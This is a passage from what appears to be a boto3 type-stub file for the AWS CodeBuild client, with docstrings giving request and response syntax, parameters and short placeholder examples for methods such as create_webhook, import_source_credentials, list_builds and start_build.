- **credentialProvider** *(string) --* **[REQUIRED]**
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
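Taken together, a minimal ``environment`` value might look like the following sketch (the curated image name and variable names are assumptions for illustration)::
    environment={
        'type': 'LINUX_CONTAINER',
        'image': 'aws/codebuild/standard:2.0',  # assumed curated image name
        'computeType': 'BUILD_GENERAL1_SMALL',
        'environmentVariables': [
            # PARAMETER_STORE keeps the value out of plain text in the console and CLI.
            {'name': 'DB_PASSWORD', 'value': '/prod/db/password', 'type': 'PARAMETER_STORE'}
        ],
        'imagePullCredentialsType': 'CODEBUILD'
    }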
:type serviceRole: string
:param serviceRole: **[REQUIRED]**
The ARN of the AWS Identity and Access Management (IAM) role that enables AWS CodeBuild to interact with dependent AWS services on behalf of the AWS account.
:type timeoutInMinutes: integer
:param timeoutInMinutes:
How long, in minutes, from 5 to 480 (8 hours), for AWS CodeBuild to wait before it times out any build that has not been marked as completed. The default is 60 minutes.
:type queuedTimeoutInMinutes: integer
:param queuedTimeoutInMinutes:
The number of minutes a build is allowed to be queued before it times out.
:type encryptionKey: string
:param encryptionKey:
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
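Either form is accepted; for example (both values below are placeholders)::
    encryptionKey='arn:aws:kms:us-east-1:123456789012:key/your-key-id'
    # or, by alias:
    encryptionKey='alias/my-codebuild-key'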
:type tags: list
:param tags:
A set of tags for this build project.
These tags are available for use by AWS services that support AWS CodeBuild build project tags.
- *(dict) --*
A tag, consisting of a key and a value.
This tag is available for use by AWS services that support tags in AWS CodeBuild.
- **key** *(string) --*
The tag's key.
- **value** *(string) --*
The tag's value.
:type vpcConfig: dict
:param vpcConfig:
VpcConfig enables AWS CodeBuild to access resources in an Amazon VPC.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security group IDs in your Amazon VPC.
- *(string) --*
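A sketch with placeholder IDs::
    vpcConfig={
        'vpcId': 'vpc-0123456789abcdef0',
        'subnets': ['subnet-0123456789abcdef0'],
        'securityGroupIds': ['sg-0123456789abcdef0']
    }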
:type badgeEnabled: boolean
:param badgeEnabled:
Set this to true to generate a publicly accessible URL for your project's build badge.
:type logsConfig: dict
:param logsConfig:
Information about logs for the build project. These can be logs in Amazon CloudWatch Logs, logs uploaded to a specified S3 bucket, or both.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project. Amazon CloudWatch Logs are enabled by default.
- **status** *(string) --* **[REQUIRED]**
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about logs built to an S3 bucket for a build project. S3 logs are not enabled by default.
- **status** *(string) --* **[REQUIRED]**
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
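For example, a ``logsConfig`` that keeps CloudWatch Logs enabled and also writes encrypted logs to an assumed bucket/prefix might be::
    logsConfig={
        'cloudWatchLogs': {'status': 'ENABLED'},
        's3Logs': {
            'status': 'ENABLED',
            'location': 'my-bucket/build-log',  # bucket/prefix form from above
            'encryptionDisabled': False
        }
    }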
:rtype: dict
:returns:
"""
pass
def create_webhook(self, projectName: str, branchFilter: str = None, filterGroups: List = None) -> Dict:
"""
For an existing AWS CodeBuild build project that has its source code stored in a GitHub or Bitbucket repository, enables AWS CodeBuild to start rebuilding the source code every time a code change is pushed to the repository.
.. warning::
If you enable webhooks for an AWS CodeBuild project, and the project is used as a build step in AWS CodePipeline, then two identical builds are created for each commit. One build is triggered through webhooks, and one through AWS CodePipeline. Because billing is on a per-build basis, you are billed for both builds. Therefore, if you are using AWS CodePipeline, we recommend that you disable webhooks in AWS CodeBuild. In the AWS CodeBuild console, clear the Webhook box. For more information, see step 5 in `Change a Build Project's Settings <https://docs.aws.amazon.com/codebuild/latest/userguide/change-project.html#change-project-console>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/CreateWebhook>`_
**Request Syntax**
::
response = client.create_webhook(
projectName='string',
branchFilter='string',
filterGroups=[
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
]
)
**Response Syntax**
::
{
'webhook': {
'url': 'string',
'payloadUrl': 'string',
'secret': 'string',
'branchFilter': 'string',
'filterGroups': [
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
],
'lastModifiedSecret': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **webhook** *(dict) --*
Information about a webhook that connects repository events to a build project in AWS CodeBuild.
- **url** *(string) --*
The URL to the webhook.
- **payloadUrl** *(string) --*
The AWS CodeBuild endpoint where webhook events are sent.
- **secret** *(string) --*
The secret token of the associated repository.
.. note::
A Bitbucket webhook does not support ``secret`` .
- **branchFilter** *(string) --*
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
- **filterGroups** *(list) --*
An array of arrays of ``WebhookFilter`` objects used to determine which webhooks are triggered. At least one ``WebhookFilter`` in the array must specify ``EVENT`` as its ``type`` .
For a build to be triggered, at least one filter group in the ``filterGroups`` array must pass. For a filter group to pass, each of its filters must pass.
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --*
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` event type works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --*
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
- **lastModifiedSecret** *(datetime) --*
A timestamp that indicates the last time a repository's secret token was modified.
:type projectName: string
:param projectName: **[REQUIRED]**
The name of the AWS CodeBuild project.
:type branchFilter: string
:param branchFilter:
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
:type filterGroups: list
:param filterGroups:
An array of arrays of ``WebhookFilter`` objects used to determine which webhooks are triggered. At least one ``WebhookFilter`` in the array must specify ``EVENT`` as its ``type`` .
For a build to be triggered, at least one filter group in the ``filterGroups`` array must pass. For a filter group to pass, each of its filters must pass.
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --* **[REQUIRED]**
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` event type works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --* **[REQUIRED]**
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
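As a sketch (the project name and patterns are assumptions), a single filter group that triggers builds only for pushes to a ``master`` branch might look like::
    response = client.create_webhook(
        projectName='my-project',
        filterGroups=[
            [  # every filter in this group must pass
                {'type': 'EVENT', 'pattern': 'PUSH'},
                {'type': 'HEAD_REF', 'pattern': '^refs/heads/master$'}
            ]
        ]
    )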
:rtype: dict
:returns:
"""
pass
def delete_project(self, name: str) -> Dict:
"""
Deletes a build project.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/DeleteProject>`_
**Request Syntax**
::
response = client.delete_project(
name='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type name: string
:param name: **[REQUIRED]**
The name of the build project.
:rtype: dict
:returns:
"""
pass
def delete_source_credentials(self, arn: str) -> Dict:
"""
Deletes a set of GitHub, GitHub Enterprise, or Bitbucket source credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/DeleteSourceCredentials>`_
**Request Syntax**
::
response = client.delete_source_credentials(
arn='string'
)
**Response Syntax**
::
{
'arn': 'string'
}
**Response Structure**
- *(dict) --*
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the token.
:type arn: string
:param arn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the token.
:rtype: dict
:returns:
"""
pass
def delete_webhook(self, projectName: str) -> Dict:
"""
For an existing AWS CodeBuild build project that has its source code stored in a GitHub or Bitbucket repository, stops AWS CodeBuild from rebuilding the source code every time a code change is pushed to the repository.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/DeleteWebhook>`_
**Request Syntax**
::
response = client.delete_webhook(
projectName='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type projectName: string
:param projectName: **[REQUIRED]**
The name of the AWS CodeBuild project.
:rtype: dict
:returns:
"""
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
``ClientMethod``.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds).
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method's model.
:returns: The presigned url
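A generic sketch (the client method and parameters are illustrative)::
    url = client.generate_presigned_url(
        ClientMethod='list_projects',
        Params={},
        ExpiresIn=3600
    )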
"""
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you'd normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator("create_foo")``.
:raise OperationNotPageableError: Raised if the operation is not
pageable. You can use the ``client.can_paginate`` method to
check if an operation is pageable.
:rtype: L{botocore.paginate.Paginator}
:return: A paginator object.
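For example, assuming the ``list_builds`` operation is pageable for this client, a sketch::
    paginator = client.get_paginator('list_builds')
    for page in paginator.paginate():
        for build_id in page['ids']:
            print(build_id)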
"""
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def import_source_credentials(self, token: str, serverType: str, authType: str, username: str = None) -> Dict:
"""
Imports the source repository credentials for an AWS CodeBuild project that has its source code stored in a GitHub, GitHub Enterprise, or Bitbucket repository.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/ImportSourceCredentials>`_
**Request Syntax**
::
response = client.import_source_credentials(
username='string',
token='string',
serverType='GITHUB'|'BITBUCKET'|'GITHUB_ENTERPRISE',
authType='OAUTH'|'BASIC_AUTH'|'PERSONAL_ACCESS_TOKEN'
)
**Response Syntax**
::
{
'arn': 'string'
}
**Response Structure**
- *(dict) --*
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the token.
:type username: string
:param username:
The Bitbucket username when the ``authType`` is BASIC_AUTH. This parameter is not valid for other types of source providers or connections.
:type token: string
:param token: **[REQUIRED]**
For GitHub or GitHub Enterprise, this is the personal access token. For Bitbucket, this is the app password.
:type serverType: string
:param serverType: **[REQUIRED]**
The source provider used for this project.
:type authType: string
:param authType: **[REQUIRED]**
The type of authentication used to connect to a GitHub, GitHub Enterprise, or Bitbucket repository. An OAUTH connection is not supported by the API and must be created using the AWS CodeBuild console.
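A sketch importing a GitHub personal access token (the token value is a placeholder; never hard-code real tokens)::
    response = client.import_source_credentials(
        token='ghp_example_placeholder',
        serverType='GITHUB',
        authType='PERSONAL_ACCESS_TOKEN'
    )
    arn = response['arn']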
:rtype: dict
:returns:
"""
pass
def invalidate_project_cache(self, projectName: str) -> Dict:
"""
Resets the cache for a project.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/InvalidateProjectCache>`_
**Request Syntax**
::
response = client.invalidate_project_cache(
projectName='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type projectName: string
:param projectName: **[REQUIRED]**
The name of the AWS CodeBuild build project that the cache is reset for.
:rtype: dict
:returns:
"""
pass
def list_builds(self, sortOrder: str = None, nextToken: str = None) -> Dict:
"""
Gets a list of build IDs, with each build ID representing a single build.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/ListBuilds>`_
**Request Syntax**
::
response = client.list_builds(
sortOrder='ASCENDING'|'DESCENDING',
nextToken='string'
)
**Response Syntax**
::
{
'ids': [
'string',
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ids** *(list) --*
A list of build IDs, with each build ID representing a single build.
- *(string) --*
- **nextToken** *(string) --*
If there are more than 100 items in the list, only the first 100 items are returned, along with a unique string called a *next token* . To get the next batch of items in the list, call this operation again, adding the next token to the call.
:type sortOrder: string
:param sortOrder:
The order to list build IDs. Valid values include:
* ``ASCENDING`` : List the build IDs in ascending order by build ID.
* ``DESCENDING`` : List the build IDs in descending order by build ID.
:type nextToken: string
:param nextToken:
During a previous call, if there are more than 100 items in the list, only the first 100 items are returned, along with a unique string called a *next token* . To get the next batch of items in the list, call this operation again, adding the next token to the call. To get all of the items in the list, keep calling this operation with each subsequent next token that is returned, until no more next tokens are returned.
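A minimal manual-pagination sketch using ``nextToken``::
    ids = []
    kwargs = {'sortOrder': 'DESCENDING'}
    while True:
        page = client.list_builds(**kwargs)
        ids.extend(page['ids'])
        token = page.get('nextToken')
        if not token:
            break
        kwargs['nextToken'] = token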
:rtype: dict
:returns:
"""
pass
def list_builds_for_project(self, projectName: str, sortOrder: str = None, nextToken: str = None) -> Dict:
"""
Gets a list of build IDs for the specified build project, with each build ID representing a single build.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/ListBuildsForProject>`_
**Request Syntax**
::
response = client.list_builds_for_project(
projectName='string',
sortOrder='ASCENDING'|'DESCENDING',
nextToken='string'
)
**Response Syntax**
::
{
'ids': [
'string',
],
'nextToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ids** *(list) --*
A list of build IDs for the specified build project, with each build ID representing a single build.
- *(string) --*
- **nextToken** *(string) --*
If there are more than 100 items in the list, only the first 100 items are returned, along with a unique string called a *next token* . To get the next batch of items in the list, call this operation again, adding the next token to the call.
:type projectName: string
:param projectName: **[REQUIRED]**
The name of the AWS CodeBuild project.
:type sortOrder: string
:param sortOrder:
The order to list build IDs. Valid values include:
* ``ASCENDING`` : List the build IDs in ascending order by build ID.
* ``DESCENDING`` : List the build IDs in descending order by build ID.
:type nextToken: string
:param nextToken:
During a previous call, if there are more than 100 items in the list, only the first 100 items are returned, along with a unique string called a *next token* . To get the next batch of items in the list, call this operation again, adding the next token to the call. To get all of the items in the list, keep calling this operation with each subsequent next token that is returned, until no more next tokens are returned.
:rtype: dict
:returns:
"""
pass
def list_curated_environment_images(self) -> Dict:
"""
Gets information about Docker images that are managed by AWS CodeBuild.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/ListCuratedEnvironmentImages>`_
**Request Syntax**
::
response = client.list_curated_environment_images()
**Response Syntax**
::
{
'platforms': [
{
'platform': 'DEBIAN'|'AMAZON_LINUX'|'UBUNTU'|'WINDOWS_SERVER',
'languages': [
{
'language': 'JAVA'|'PYTHON'|'NODE_JS'|'RUBY'|'GOLANG'|'DOCKER'|'ANDROID'|'DOTNET'|'BASE'|'PHP',
'images': [
{
'name': 'string',
'description': 'string',
'versions': [
'string',
]
},
]
},
]
},
]
}
**Response Structure**
- *(dict) --*
- **platforms** *(list) --*
Information about supported platforms for Docker images that are managed by AWS CodeBuild.
- *(dict) --*
A set of Docker images that are related by platform and are managed by AWS CodeBuild.
- **platform** *(string) --*
The platform's name.
- **languages** *(list) --*
The list of programming languages that are available for the specified platform.
- *(dict) --*
A set of Docker images that are related by programming language and are managed by AWS CodeBuild.
- **language** *(string) --*
The programming language for the Docker images.
- **images** *(list) --*
The list of Docker images that are related by the specified programming language.
- *(dict) --*
Information about a Docker image that is managed by AWS CodeBuild.
- **name** *(string) --*
The name of the Docker image.
- **description** *(string) --*
The description of the Docker image.
- **versions** *(list) --*
A list of environment image versions.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def list_projects(self, sortBy: str = None, sortOrder: str = None, nextToken: str = None) -> Dict:
"""
Gets a list of build project names, with each build project name representing a single build project.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/ListProjects>`_
**Request Syntax**
::
response = client.list_projects(
sortBy='NAME'|'CREATED_TIME'|'LAST_MODIFIED_TIME',
sortOrder='ASCENDING'|'DESCENDING',
nextToken='string'
)
**Response Syntax**
::
{
'nextToken': 'string',
'projects': [
'string',
]
}
**Response Structure**
- *(dict) --*
- **nextToken** *(string) --*
If there are more than 100 items in the list, only the first 100 items are returned, along with a unique string called a *next token* . To get the next batch of items in the list, call this operation again, adding the next token to the call.
- **projects** *(list) --*
The list of build project names, with each build project name representing a single build project.
- *(string) --*
:type sortBy: string
:param sortBy:
The criterion to be used to list build project names. Valid values include:
* ``CREATED_TIME`` : List based on when each build project was created.
* ``LAST_MODIFIED_TIME`` : List based on when information about each build project was last changed.
* ``NAME`` : List based on each build project's name.
Use ``sortOrder`` to specify in what order to list the build project names based on the preceding criteria.
:type sortOrder: string
:param sortOrder:
The order in which to list build projects. Valid values include:
* ``ASCENDING`` : List in ascending order.
* ``DESCENDING`` : List in descending order.
Use ``sortBy`` to specify the criterion to be used to list build project names.
:type nextToken: string
:param nextToken:
During a previous call, if there are more than 100 items in the list, only the first 100 items are returned, along with a unique string called a *next token* . To get the next batch of items in the list, call this operation again, adding the next token to the call. To get all of the items in the list, keep calling this operation with each subsequent next token that is returned, until no more next tokens are returned.
:rtype: dict
:returns:
"""
pass
def list_source_credentials(self) -> Dict:
"""
Returns a list of ``SourceCredentialsInfo`` objects.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/ListSourceCredentials>`_
**Request Syntax**
::
response = client.list_source_credentials()
**Response Syntax**
::
{
'sourceCredentialsInfos': [
{
'arn': 'string',
'serverType': 'GITHUB'|'BITBUCKET'|'GITHUB_ENTERPRISE',
'authType': 'OAUTH'|'BASIC_AUTH'|'PERSONAL_ACCESS_TOKEN'
},
]
}
**Response Structure**
- *(dict) --*
- **sourceCredentialsInfos** *(list) --*
A list of ``SourceCredentialsInfo`` objects. Each ``SourceCredentialsInfo`` object includes the authentication type, token ARN, and type of source provider for one set of credentials.
- *(dict) --*
Information about the credentials for a GitHub, GitHub Enterprise, or Bitbucket repository.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the token.
- **serverType** *(string) --*
The type of source provider. The valid options are GITHUB, GITHUB_ENTERPRISE, or BITBUCKET.
- **authType** *(string) --*
The type of authentication used by the credentials. Valid options are OAUTH, BASIC_AUTH, or PERSONAL_ACCESS_TOKEN.
:rtype: dict
:returns:
"""
pass
def start_build(self, projectName: str, secondarySourcesOverride: List = None, secondarySourcesVersionOverride: List = None, sourceVersion: str = None, artifactsOverride: Dict = None, secondaryArtifactsOverride: List = None, environmentVariablesOverride: List = None, sourceTypeOverride: str = None, sourceLocationOverride: str = None, sourceAuthOverride: Dict = None, gitCloneDepthOverride: int = None, gitSubmodulesConfigOverride: Dict = None, buildspecOverride: str = None, insecureSslOverride: bool = None, reportBuildStatusOverride: bool = None, environmentTypeOverride: str = None, imageOverride: str = None, computeTypeOverride: str = None, certificateOverride: str = None, cacheOverride: Dict = None, serviceRoleOverride: str = None, privilegedModeOverride: bool = None, timeoutInMinutesOverride: int = None, queuedTimeoutInMinutesOverride: int = None, idempotencyToken: str = None, logsConfigOverride: Dict = None, registryCredentialOverride: Dict = None, imagePullCredentialsTypeOverride: str = None) -> Dict:
"""
Starts running a build.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/StartBuild>`_
**Request Syntax**
::
response = client.start_build(
projectName='string',
secondarySourcesOverride=[
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
secondarySourcesVersionOverride=[
{
'sourceIdentifier': 'string',
'sourceVersion': 'string'
},
],
sourceVersion='string',
artifactsOverride={
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
secondaryArtifactsOverride=[
{
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
environmentVariablesOverride=[
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
sourceTypeOverride='CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
sourceLocationOverride='string',
sourceAuthOverride={
'type': 'OAUTH',
'resource': 'string'
},
gitCloneDepthOverride=123,
gitSubmodulesConfigOverride={
'fetchSubmodules': True|False
},
buildspecOverride='string',
insecureSslOverride=True|False,
reportBuildStatusOverride=True|False,
environmentTypeOverride='WINDOWS_CONTAINER'|'LINUX_CONTAINER',
imageOverride='string',
computeTypeOverride='BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
certificateOverride='string',
cacheOverride={
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
serviceRoleOverride='string',
privilegedModeOverride=True|False,
timeoutInMinutesOverride=123,
queuedTimeoutInMinutesOverride=123,
idempotencyToken='string',
logsConfigOverride={
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
},
registryCredentialOverride={
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
imagePullCredentialsTypeOverride='CODEBUILD'|'SERVICE_ROLE'
)
**Response Syntax**
::
{
'build': {
'id': 'string',
'arn': 'string',
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'currentPhase': 'string',
'buildStatus': 'SUCCEEDED'|'FAILED'|'FAULT'|'TIMED_OUT'|'IN_PROGRESS'|'STOPPED',
'sourceVersion': 'string',
'resolvedSourceVersion': 'string',
'projectName': 'string',
'phases': [
{
'phaseType': 'SUBMITTED'|'QUEUED'|'PROVISIONING'|'DOWNLOAD_SOURCE'|'INSTALL'|'PRE_BUILD'|'BUILD'|'POST_BUILD'|'UPLOAD_ARTIFACTS'|'FINALIZING'|'COMPLETED',
'phaseStatus': 'SUCCEEDED'|'FAILED'|'FAULT'|'TIMED_OUT'|'IN_PROGRESS'|'STOPPED',
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'durationInSeconds': 123,
'contexts': [
{
'statusCode': 'string',
'message': 'string'
},
]
},
],
'source': {
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
'secondarySources': [
{
